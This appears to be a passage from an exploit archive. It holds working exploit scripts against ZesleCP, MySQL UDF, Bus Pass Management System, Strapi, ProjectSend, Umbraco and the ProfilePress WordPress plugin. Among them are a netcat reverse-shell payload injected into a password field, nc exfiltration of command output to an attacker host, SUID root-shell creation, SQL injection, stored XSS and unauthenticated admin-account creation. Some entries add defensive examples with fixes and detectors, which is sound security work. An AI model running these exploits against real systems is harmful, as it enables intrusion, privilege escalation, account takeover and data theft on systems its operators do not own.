            last_gets_key = re.findall(r"edit_key\.cgi\?(.*?)'", str(key_list.content))[-2]
            print("[+] Key : {}".format(last_gets_key))
            session.headers.update({'referer': target})
            # opening the key runs the injected command; the shell keeps the request open, hence the timeout
            try:
                key_list = session.post(target + "/gnupg/edit_key.cgi?{}".format(last_gets_key),
                                        verify=False, timeout=3)
            except requests.exceptions.ReadTimeout:
                pass
            print("[+] 5ucc355fully_3xpl017")
        else:
            print("[-] an unexpected error occurred")
    else:
        print("[-] AUTH : Login failed.")


if __name__ == "__main__":
    init()
-
ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
# Title: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 27.08.2021
# Author: Numan Türle
# Vendor Homepage: https://zeslecp.com/
# Software Link: https://zeslecp.com/
# Version: <=3.1.9
# https://www.youtube.com/watch?v=5lTDTEBVq-0

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
# author: twitter.com/numanturle
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://www.youtube.com/watch?v=5lTDTEBVq-0

import argparse, requests, warnings, json, random, string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd

warnings.simplefilter('ignore', InsecureRequestWarning)


def init():
    parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )')
    parser.add_argument('-u', '--host', help='Host', type=str, required=True)
    parser.add_argument('-l', '--login', help='Username', type=str, required=True)
    parser.add_argument('-p', '--password', help='Password', type=str, required=True)
    args = parser.parse_args()
    exploit(args)


def exploit(args):
    # address/port the reverse shell connects back to; set to your listener
    listen_ip = "0.0.0.0"
    listen_port = 1337
    session = requests.Session()
    target = "https://{}:2087".format(args.host)
    username = args.login
    password = args.password
    print("[+] Target {}".format(target))
    login = session.post(target + "/login", verify=False, json={"username": username, "password": password})
    login_json = json.loads(login.content)
    if login_json["success"]:
        session_hand_login = session.cookies.get_dict()
        print("[+] Login successfully")
        print("[+] Creating ftp account")
        ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))
        print("[+] Username : {}".format(ftp_username))
        print("[+] Send payload....")
        # the FTP password lands inside a single-quoted shell argument: close it, run the payload, reopen it
        payload = {
            "ftp_user": ftp_username,
            "ftp_password": "1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip, listen_port)
        }
        try:
            feth_weblist = session.post(target + "/core/ftp", verify=False, json=payload, timeout=3)
        except requests.exceptions.ReadTimeout:
            pass
        print("[+] Successful")
    else:
        print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))


if __name__ == "__main__":
    init()
-
MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)
# Exploit Title: MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)
# Date: 29/08/2021
# Exploit Author: ninpwn
# Vendor Homepage: https://www.mysql.com
# Software Link: www.mysql.com
# Version: MySQL 4.x/5.x
# Tested on: Debian GNU/Linux 9 / mysql Ver 14.14 Distrib 5.7.30, for Linux (x86_64) using EditLine wrapper
# CVE : N/A

'''
*** MySQL User-Defined (Linux) x32 / x86_64 sys_exec function Local Privilege Escalation Exploit - Python 3 Version ***

UDF lib shellcodes retrieved from metasploit (there are windows .dll libraries within metasploit as well so this could be easily ported to Windows)
Based on the Python 2 exploit by D7X (EDB ID: 46249) and the famous raptor_udf.c by Marco Ivaldi (EDB ID: 1518)

CVE: N/A

References:
https://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html
https://www.exploit-db.com/exploits/1518
https://www.exploit-db.com/exploits/46249
https://www.exploit-db.com/papers/44139/ - MySQL UDF Exploitation by Osanda Malith Jayathissa (@OsandaMalith)

Tested on Linux 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux

@ninpwn
https://twitter.com/ninpwn
'''

#!/usr/bin/python3
import sys
import subprocess
import platform, random
import argparse
import os
import re

# hex-encoded lib_mysqludf_sys shared objects taken from metasploit (the blobs are elided on this page)
shellcode_x32 = "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"
shellcode_x64 = "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"
shellcode = shellcode_x32
if platform.architecture()[0] == '64bit':
    shellcode = shellcode_x64

# MySQL username and password: make sure you have FILE privileges and mysql is actually running as root
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True)
parser.add_argument('--password', '-p', help='MySQL password', type=str)
args = parser.parse_args()
username = args.username
password = args.password or ''


def mysql(query):
    """Run one statement through the mysql client and return its output as text.
    An argument vector is used instead of a shell string so quotes in the password
    or query cannot break the command line."""
    argv = ['mysql', '-u', username]
    if password:
        argv.append('-p' + password)
    argv += ['-e', query]
    return subprocess.run(argv, capture_output=True, text=True).stdout


# check_output() returns bytes under Python 3, so the client output is decoded via text=True above
plugin_dir = re.search(r'@@plugin_dir: (\S*)', mysql(r'select @@plugin_dir \G'))
if not plugin_dir:
    print("Error: could not locate the plugin directory")
    sys.exit(1)
plugin_dir_ = plugin_dir.group(1)
print("Plugin dir is %s" % plugin_dir_)

# file to save the udf .so to
udf_filename = 'udf' + str(random.randint(1000, 10000)) + '.so'
udf_outfile = os.path.join(plugin_dir_, udf_filename)

# alternative way:
# set @outputpath := @@plugin_dir;

print("Trying to create a udf library...")
mysql(r"select binary 0x%s into dumpfile '%s' \G" % (shellcode, udf_outfile))
if not os.path.isfile(udf_outfile):
    print("Error: could not create udf file in %s (mysql is either not running as root or may be file exists?)" % udf_outfile)
    sys.exit(1)
print("UDF library created successfully: %s" % udf_outfile)

print("Trying to create sys_exec...")
mysql(r"create function sys_exec returns int soname '%s' \G" % udf_filename)

print("Checking if sys_exec was created...")
res = mysql(r"select * from mysql.func where name='sys_exec' \G")
if not res.strip():
    print("sys_exec was not found (good luck next time!)")
    sys.exit(1)
print("sys_exec was found: %s" % res)
print("Generating a SUID binary in /var/www/bash...")
mysql("select sys_exec('cp /bin/bash /var/www/bash && chmod +s /var/www/bash')")
print("Trying to spawn a root shell...")
os.system("cd /var/www && ./bash -p")
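The exploit above stands or falls on three preconditions it never checks: the account needs the FILE privilege, `INTO DUMPFILE` must be allowed to write into `plugin_dir` at all, and mysqld must run as root for the SUID copy to matter. The second one is governed by `secure_file_priv`, which on many MySQL 5.7+ installs is either NULL (file export disabled) or a dedicated directory such as /var/lib/mysql-files that is not the plugin directory, so the dumpfile step fails silently. The following is an added example, not part of the exploit above: it parses the mysql client's vertical (`\G`) output the way the script does but correctly under Python 3, decides whether the dumpfile path is viable, and, for the defender, flags entries in mysql.func that point at an unknown shared object. All client output below is constructed sample text, not captured from a real server.

```python
import os
import re

# Constructed samples of `mysql ... \G` (vertical) output.  check_output()
# returns bytes, which is the same type the PoC hands to re.search().
SAMPLE_PLUGIN_DIR = (
    b"*************************** 1. row ***************************\n"
    b"@@plugin_dir: /usr/lib/mysql/plugin/\n"
)
SAMPLE_SECURE_FILE_PRIV = (
    b"*************************** 1. row ***************************\n"
    b"Variable_name: secure_file_priv\n"
    b"        Value: /var/lib/mysql-files/\n"
)
SAMPLE_FUNC_TABLE = (
    b"*************************** 1. row ***************************\n"
    b"name: sys_exec\n ret: 2\n  dl: udf4721.so\ntype: function\n"
    b"*************************** 2. row ***************************\n"
    b"name: fnv_64\n ret: 2\n  dl: libmysqludf_fnv.so\ntype: function\n"
)

ROW_SEP = re.compile(rb"^\*+ \d+\. row \*+$", re.M)


def parse_vertical(output: bytes) -> list:
    """Parse mysql \\G output into a list of {column: value} dicts, one per row."""
    rows = []
    for chunk in ROW_SEP.split(output):
        cols = {}
        for line in chunk.decode("utf-8", "replace").splitlines():
            m = re.match(r"\s*([^:]+):\s?(.*)$", line)
            if m:
                cols[m.group(1).strip()] = m.group(2).strip()
        if cols:
            rows.append(cols)
    return rows


def udf_write_allowed(plugin_dir: str, secure_file_priv: str) -> bool:
    """INTO DUMPFILE only works where secure_file_priv permits: the string
    "NULL" disables file export entirely, "" means any directory the mysqld
    user can write, and a path restricts exports to that directory (which the
    plugin directory normally is not)."""
    if secure_file_priv == "NULL":
        return False
    if secure_file_priv == "":
        return True
    base = os.path.normpath(secure_file_priv)
    target = os.path.normpath(plugin_dir)
    return target == base or target.startswith(base + os.sep)


def suspicious_udfs(func_output: bytes, allowlist=("libmysqludf_fnv.so",)) -> list:
    """Defender side: rows of mysql.func whose shared object is not a known,
    deliberately deployed library.  A random udfNNNN.so name is the
    fingerprint of the PoC above and of the Metasploit module it borrows from.
    The allowlist is an assumed site-specific list."""
    return [r for r in parse_vertical(func_output) if r.get("dl") not in allowlist]


if __name__ == "__main__":
    plugin_dir = parse_vertical(SAMPLE_PLUGIN_DIR)[0]["@@plugin_dir"]
    sfp = parse_vertical(SAMPLE_SECURE_FILE_PRIV)[0]["Value"]
    print("plugin_dir:", plugin_dir, "secure_file_priv:", sfp)
    print("dumpfile into plugin_dir possible:", udf_write_allowed(plugin_dir, sfp))
    print("unexpected UDFs:", [r["name"] for r in suspicious_udfs(SAMPLE_FUNC_TABLE)])
```

Run the two variable queries before attempting the dumpfile step; if `udf_write_allowed()` is false, this technique is dead on that host regardless of privileges. On the defensive side, `suspicious_udfs()` over `SELECT * FROM mysql.func \G` output is a cheap periodic check, since a successful UDF install leaves a row there.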
-
Bus Pass Management System 1.0 - 'viewid' SQL Injection
# Exploit Title: Bus Pass Management System 1.0 - 'viewid' SQL Injection
# Date: 2021-08-28
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Windows 10 - Wamp Server

# Vulnerable page: http://localhost/buspassms/admin/view-pass-detail.php?viewid=
# Vulnerable parameter: the viewid parameter is vulnerable to SQL injection

# Proof Of Concept:
# 1. Download and install [ bus-pass-management-system ]
# 2. Go to /admin/index.php and enter the username & password
# 3. Navigate to Passes >> Manage Pass
# 4. Click on "view" and append the SQL payload to the URL:
#    http://localhost/buspassms/admin/view-pass-detail.php?viewid=1'[Sql Payload]
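The PoC above stops at `viewid=1'` followed by a payload. The following is an added example, not the vendor's code or the advisory's: it reproduces the assumed shape of the bug (the GET parameter pasted into a quoted string in the WHERE clause) against an in-memory SQLite table standing in for the pass table, runs the boolean-based and UNION-based payloads that such a position admits, and shows the parameterised replacement next to it. The table name and columns are constructed for the example, not taken from the product.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's pass table (not the vendor's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblpass (ID INTEGER PRIMARY KEY, FullName TEXT, PassNumber TEXT)")
    conn.executemany("INSERT INTO tblpass VALUES (?, ?, ?)",
                     [(1, "Alice", "BP-1001"), (2, "Bob", "BP-1002"), (3, "Carol", "BP-1003")])
    return conn


def view_pass_vulnerable(conn: sqlite3.Connection, viewid: str) -> list:
    """Assumed shape of the bug: the request parameter is interpolated inside
    single quotes, the exact position the PoC targets with viewid=1'..."""
    sql = f"SELECT ID, FullName, PassNumber FROM tblpass WHERE ID='{viewid}'"
    return conn.execute(sql).fetchall()


def view_pass_fixed(conn: sqlite3.Connection, viewid: str):
    """Fix: check the identifier's type, then bind it as a parameter so the
    value can never become part of the statement.  Returns None on rejection."""
    if not viewid.isdigit():
        return None
    return conn.execute("SELECT ID, FullName, PassNumber FROM tblpass WHERE ID=?",
                        (int(viewid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(view_pass_vulnerable(db, "1"))                  # the intended single row
    print(view_pass_vulnerable(db, "1' OR '1'='1"))       # every pass: boolean-based, true branch
    print(view_pass_vulnerable(db, "1' AND '1'='2"))      # nothing: false branch
    print(view_pass_vulnerable(db, "0' UNION SELECT 1, sqlite_version(), 'leak"))  # UNION data exfil
    print(view_pass_fixed(db, "1' OR '1'='1"))            # None: rejected before the query
```

The true/false pair is what an automated tool uses to confirm the injection without error messages; the UNION payload shows that once the column count is matched, arbitrary data (here the engine version) is returned through the pass-detail page. SQLite is used only so the example runs offline; the quoting behaviour is the same in MySQL.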
-
Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Date: 2021-08-29
# Exploit Author: David Anglada [CodiObert]
# Vendor Homepage: https://strapi.io/
# Version: 3.0.0-beta
# Tested on: Linux
# CVE: CVE-2019-18818

#!/usr/bin/python
import requests
import sys
import json

userEmail = "[email protected]"
strapiUrl = "http://strapi.url"
newPassword = "codiobert"

s = requests.Session()

# Get strapi version
strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)
print("[*] strapi version: {}".format(strapiVersion["strapiVersion"]))

# Validate vulnerable version
if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'):
    # Password reset
    print("[*] Password reset for user: {}".format(userEmail))
    resetPasswordReq = {"email": userEmail,
                        "url": "{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)}
    s.post("{}/".format(strapiUrl), json=resetPasswordReq)

    # Set new password: an empty object as "code" is not rejected and matches the user lookup
    print("[*] Setting new password")
    exploit = {"code": {}, "password": newPassword, "passwordConfirmation": newPassword}
    r = s.post("{}/admin/auth/reset-password".format(strapiUrl), json=exploit)

    # Check if the password has changed
    if "username" in str(r.content):
        print("[+] New password '{}' set for user {}".format(newPassword, userEmail))
    else:
        print("\033[91m[-] Something went wrong\033[0m")
        sys.exit(1)
else:
    print("\033[91m[-] This version is not vulnerable\033[0m")
    sys.exit(1)
-
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 29/08/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://strapi.io/
# Affected Version: strapi-3.0.0-beta.17.7 and earlier
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2019-19609

#!/usr/bin/python3
# Author: @David_Uton (m3n0sd0n4ld)
# Github: https://m3n0sd0n4ld.github.io
# Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST

import requests, sys, os, socket

logoType = ('''
=====================================
CVE-2019-19609 - Strapi RCE
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
=====================================
''')

if __name__ == '__main__':
    # Parameter checking
    if len(sys.argv) != 5:
        print(logoType)
        print("[!] Some of these parameters are missing.")
        print('''
Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
Example: python3 %s http://10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % (sys.argv[0], sys.argv[0]))
    # Exploit run
    else:
        # Parameters
        url = sys.argv[1]
        token = sys.argv[2]
        command = sys.argv[3]
        lhost = sys.argv[4]
        lport = 9999

        s = requests.session()
        r = s.post(url, verify=False)  # SSL == verify=True

        headersData = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
            'Authorization': "Bearer %s" % token
        }

        # the plugin name is passed to a shell by the install endpoint; command output is sent back over nc
        postData = {
            "plugin": "documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport)
        }

        print(logoType)
        # listener that receives the command output
        os.system("nc -nvlp %d &" % lport)
        try:
            r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False)  # SSL == verify=True
            print("[+] Successful operation!!!")
            # Content print
            print(r.text)
        except requests.exceptions.RequestException:
            print("[!] An error occurred, try again.")
            sys.exit(1)
-
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-08-30
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://strapi.io/
# Software Link: https://strapi.io/
# Version: Strapi CMS version 3.0.0-beta.17.4 or lower
# Tested on: Ubuntu 20.04
# CVE : CVE-2019-18818, CVE-2019-19609

#!/usr/bin/env python3
import requests
import json
from cmd import Cmd
import sys

if len(sys.argv) != 2:
    print("[-] Wrong number of arguments provided")
    print("[*] Usage: python3 exploit.py <URL>\n")
    sys.exit()


class Terminal(Cmd):
    prompt = "$> "

    def default(self, args):
        code_exec(args)


def check_version():
    global url
    print("[+] Checking Strapi CMS Version running")
    version = requests.get(f"{url}/admin/init").text
    version = json.loads(version)
    version = version["data"]["strapiVersion"]
    if version == "3.0.0-beta.17.4":
        print("[+] Seems like the exploit will work!!!\n[+] Executing exploit\n\n")
    else:
        print("[-] Version mismatch, trying the exploit anyway")


def password_reset():
    global url, jwt
    session = requests.session()
    # The reset code is forwarded into a MongoDB-style query, so a query
    # object such as {"$gt": 0} matches any stored token (CVE-2019-18818).
    params = {"code": {"$gt": 0},
              "password": "SuperStrongPassword1",
              "passwordConfirmation": "SuperStrongPassword1"}
    output = session.post(f"{url}/admin/auth/reset-password", json=params).text
    response = json.loads(output)
    if "jwt" not in response:
        print("[-] Password reset unsuccessful\n[-] Exiting now\n\n")
        sys.exit(1)
    jwt = response["jwt"]
    username = response["user"]["username"]
    email = response["user"]["email"]
    print(f"[+] Password reset was successful\n[+] Your email is: {email}\n[+] Your new credentials are: {username}:SuperStrongPassword1\n[+] Your authenticated JSON Web Token: {jwt}\n\n")


def code_exec(cmd):
    global jwt, url
    print("[+] Triggering remote code execution\n[*] Remember this is a blind RCE, don't expect to see output")
    headers = {"Authorization": f"Bearer {jwt}"}
    # The plugin name reaches a shell command unsanitised (CVE-2019-19609)
    data = {"plugin": f"documentation && $({cmd})", "port": "1337"}
    out = requests.post(f"{url}/admin/plugins/install", json=data, headers=headers)
    print(out.text)


if __name__ == "__main__":
    url = sys.argv[1]
    if url.endswith("/"):
        url = url[:-1]
    check_version()
    password_reset()
    terminal = Terminal()
    terminal.cmdloop()
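The password-reset step above works because the JSON value of "code" is handed to the database lookup as-is, so a JSON object becomes a query operator instead of a token string. The following is an added illustrative example, not Strapi's own code: a constructed user collection and a small subset of MongoDB matching semantics show why {"$gt": 0} selects every user that has a token, next to the type check that closes the hole.

```python
# Added illustrative example, not Strapi's own code: why a JSON "code" of
# {"$gt": 0} satisfies a MongoDB-style token lookup for every user with a
# token, and the type check that prevents it (CVE-2019-18818). The collection
# and the query-matching subset are constructed for the demo.

# Constructed stand-in for the CMS user collection.
USERS = [
    {"username": "admin", "email": "admin@example.com", "resetPasswordToken": "a3f9c1"},
    {"username": "editor", "email": "editor@example.com", "resetPasswordToken": None},
]


def _bson_rank(value):
    """BSON orders values by type before value: null < numbers < strings."""
    if value is None:
        return 0
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return 1
    if isinstance(value, str):
        return 2
    raise TypeError(f"unsupported type {type(value).__name__}")


def _bson_gt(a, b):
    ra, rb = _bson_rank(a), _bson_rank(b)
    if ra != rb:
        return ra > rb
    return a is not None and a > b


def _matches(stored, query):
    """Subset of MongoDB matching: a plain value is an equality test, a dict
    is an operator document ({"$gt": x}, {"$ne": x})."""
    if not isinstance(query, dict):
        return stored == query
    for op, operand in query.items():
        if op == "$gt":
            if not _bson_gt(stored, operand):
                return False
        elif op == "$ne":
            if stored == operand:
                return False
        else:
            raise ValueError(f"operator {op} not modelled")
    return True


def find_one(collection, field, query):
    for doc in collection:
        if _matches(doc.get(field), query):
            return doc
    return None


def reset_password_vulnerable(body):
    """Forwards body["code"] unchanged, so a JSON object becomes a query operator."""
    return find_one(USERS, "resetPasswordToken", body["code"])


def reset_password_fixed(body):
    """Accepts only a non-empty string token, so no operator can be smuggled in."""
    code = body.get("code")
    if not isinstance(code, str) or not code:
        raise ValueError("code must be a non-empty string")
    return find_one(USERS, "resetPasswordToken", code)


if __name__ == "__main__":
    print(reset_password_vulnerable({"code": {"$gt": 0}})["username"])  # admin
    print(reset_password_fixed({"code": "a3f9c1"})["username"])         # admin
```

The same shape of bug appears wherever request JSON is passed straight into a query builder; rejecting non-string values at the edge is cheaper than auditing every query.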
-
Projectsend r1295 - 'name' Stored XSS
# Exploit Title: Projectsend r1295 - 'name' Stored XSS
# Date: 30.08.2021
# Exploit Author: Abdullah Kala
# Vendor Homepage: https://www.projectsend.org/
# Software Link: https://www.projectsend.org/download/387/
# Version: r1295
# Tested on: Ubuntu 18.04

# Description:
# First create a client group. Then, as a user with any role, upload a file; on the edit
# page you are redirected to, put the payload in the file's "name" (title) field, assign
# the group you created and save. For users with the "System Administrator" role the XSS
# is triggered on the "Dashboard" page.

POST /projectsend/files-edit.php?ids=1 HTTP/1.1
Host: 10.10.10.55
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36890316955266305672634658708
Content-Length: 1323
Origin: http://10.10.10.55
Connection: close
Referer: http://10.10.10.55/projectsend/files-edit.php?ids=5
Cookie: menu_contracted=false; PHPSESSID=kvip7m24ib2d062hcaut3fbr2o
Upgrade-Insecure-Requests: 1

-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="csrf_token"

f53a148f0f952cb00c7e7edc63be5a3efd911d5c27de15eb78c7323a6d7b3c02
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][id]"

1
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][original]"

test.png
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][file]"

1630247451-f2d3f09150beb76c7f2c83dc27732a0b23718875-kudur.png
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][name]"

<script>alert(1)</script>
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][description]"

test
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][expiry_date]"

28-09-2021
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][assignments][groups][]"

1
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="save"


-----------------------------36890316955266305672634658708--
-
Umbraco CMS 8.9.1 - Directory Traversal
# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
# Exploit Author: BitTheByte
# Description: Authenticated path traversal vulnerability.
# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
# Vendor Homepage: https://umbraco.com/
# Version: <= 8.9.1
# CVE : CVE-2020-5811

import string
import random
import argparse
import zipfile
import os
import sys

# Package manifest. {{filename}} and {{upload_path}} are left as str.format()
# placeholders (the doubled braces survive the f-string); the random package
# name is filled in here. <orgPath> is the install destination of the file and
# is not confined to the site root, which is the traversal.
package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
<umbPackage>
  <files>
    <file>
      <guid>{{filename}}</guid>
      <orgPath>{{upload_path}}</orgPath>
      <orgName>{{filename}}</orgName>
    </file>
  </files>
  <info>
    <package>
      <name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
      <version>1.0.0</version>
      <iconUrl></iconUrl>
      <license url="http://opensource.org/licenses/MIT">MIT License</license>
      <url>https://example.com</url>
      <requirements>
        <major>0</major>
        <minor>0</minor>
        <patch>0</patch>
      </requirements>
    </package>
    <author>
      <name>CVE-2020-5811</name>
      <website>https://example.com</website>
    </author>
    <contributors>
      <contributor></contributor>
    </contributors>
    <readme><![CDATA[]]></readme>
  </info>
  <DocumentTypes />
  <Templates />
  <Stylesheets />
  <Macros />
  <DictionaryItems />
  <Languages />
  <DataTypes />
  <Actions />
</umbPackage>
"""

parser = argparse.ArgumentParser(description='CVE-2020-5811')
parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
parser.add_argument('--upload-path', type=str,
                    help='Destination path of the shell on the target server (default=~/../scripts)',
                    default='~/../scripts')
args = parser.parse_args()

if not os.path.isfile(args.shell):
    print("[ERROR] please use a correct path for the shell file.")
    sys.exit(1)

output_file = "exploit.zip"
package = zipfile.ZipFile(output_file, 'w')
package.writestr('package.xml',
                 package_xml.format(filename=os.path.basename(args.shell),
                                    upload_path=args.upload_path))
with open(args.shell, 'rb') as shell:
    package.writestr(os.path.basename(args.shell), shell.read())
package.close()
print(f"[DONE] Created Umbraco package: {output_file}")
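The manifest's orgPath is a "~/"-style virtual path that the installer maps under the site root, and the default ~/../scripts in the script above walks out of it. The block below is an added example, not Umbraco's code: it resolves each <file> entry of a package.xml the way a root-relative virtual path would be mapped and refuses anything that lands outside the root. How Umbraco maps "~/" internally is an assumption here; the two manifests are constructed for the demo.

```python
# Added example, not Umbraco's code: resolve package.xml <orgPath>/<orgName>
# under the application root and reject entries that escape it, which is the
# containment check CVE-2020-5811 lacked. The "~/" mapping is assumed.
import posixpath
import xml.etree.ElementTree as ET


def resolve_org_path(app_root: str, org_path: str, org_name: str) -> str:
    """Return the absolute destination for <orgPath>/<orgName>, or raise
    ValueError if it would land outside app_root."""
    rel = org_path.replace("\\", "/")
    if rel.startswith("~"):
        rel = rel[1:]                  # "~/media" -> "/media"
    rel = rel.lstrip("/")              # every orgPath is taken as root-relative
    root = posixpath.normpath(app_root)
    dest = posixpath.normpath(posixpath.join(root, rel, org_name))
    if dest != root and not dest.startswith(root + "/"):
        raise ValueError(f"orgPath escapes application root: {org_path!r}")
    return dest


def vet_manifest(xml_text: str, app_root: str) -> list:
    """Resolve every <file> entry of a package manifest; raises on the first escape."""
    root = ET.fromstring(xml_text)
    return [resolve_org_path(app_root, f.findtext("orgPath", ""), f.findtext("orgName", ""))
            for f in root.iter("file")]


# Constructed manifests (not real packages).
SAFE_MANIFEST = """<umbPackage><files><file>
  <guid>a.txt</guid><orgPath>~/media/packages</orgPath><orgName>a.txt</orgName>
</file></files></umbPackage>"""

ESCAPING_MANIFEST = """<umbPackage><files><file>
  <guid>shell.aspx</guid><orgPath>~/../scripts</orgPath><orgName>shell.aspx</orgName>
</file></files></umbPackage>"""


if __name__ == "__main__":
    print(vet_manifest(SAFE_MANIFEST, "/var/www/site"))
    try:
        vet_manifest(ESCAPING_MANIFEST, "/var/www/site")
    except ValueError as err:
        print("rejected:", err)
```

The check normalises after joining, so "..", a leading slash, backslashes and an orgName that itself contains ".." are all handled by the single prefix comparison.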
-
WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.1.3 [2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621

#!/bin/bash
# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3
# Change the name and password as per your requirement.
# The signup handler copies submitted fields into the new user, so the
# wp_capabilities[administrator]=1 field makes the account an administrator.
URL=$1
curl -X POST "$URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "reg_username=numan" \
  -d "[email protected]" \
  -d "reg_password=numan" \
  -d "reg_password_present=true" \
  -d "wp_capabilities[administrator]=1" \
  -d "reg_first_name=pwned" \
  -d "reg_last_name=numan" \
  -d "action=pp_ajax_signup"
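The request above works because PHP turns the key wp_capabilities[administrator] into a nested array and the signup handler copies whatever arrived into the new user, where WordPress reads the role from the wp_capabilities meta. The block below is an added example and not the plugin's code: a small parser that rebuilds PHP's nested array from the form body, the copy-everything anti-pattern, and the allow-listed version in which the role can only be set server-side. The field mapping is an assumption made for the demo.

```python
# Added example, not ProfilePress code: PHP bracket-key parsing, the
# mass-assignment anti-pattern behind CVE-2021-34621, and an allow-list fix.
import re
from urllib.parse import parse_qsl

_KEY_RE = re.compile(r"^([^\[\]]+)((?:\[[^\[\]]*\])*)$")
_BRACKET_RE = re.compile(r"\[([^\[\]]*)\]")


def parse_php_form(body: str) -> dict:
    """Decode an x-www-form-urlencoded body into the nested array PHP builds
    for keys like wp_capabilities[administrator]; a[] appends with a numeric index."""
    result = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = _KEY_RE.match(key)
        if not m:
            continue
        path = [m.group(1)] + _BRACKET_RE.findall(m.group(2))
        node = result
        for part in path[:-1]:
            if part == "":
                part = str(len(node))
            node = node.setdefault(part, {})
        last = path[-1] if path[-1] != "" else str(len(node))
        node[last] = value
    return result


# Assumed mapping of form fields to the user fields they may fill.
SIGNUP_FIELDS = {
    "reg_username": "user_login",
    "reg_email": "user_email",
    "reg_password": "user_pass",
    "reg_first_name": "first_name",
    "reg_last_name": "last_name",
}


def build_new_user_vulnerable(form: dict) -> dict:
    """Anti-pattern: every submitted field lands in the user record, including
    wp_capabilities, the meta key WordPress derives the role from."""
    user = {"wp_capabilities": {"subscriber": "1"}}
    user.update(form)
    return user


def build_new_user_fixed(form: dict) -> dict:
    """Copy only allow-listed scalar fields; the role is always set server-side."""
    user = {"wp_capabilities": {"subscriber": "1"}}
    for src, dst in SIGNUP_FIELDS.items():
        value = form.get(src)
        if isinstance(value, str):
            user[dst] = value
    return user


def effective_role(user: dict) -> str:
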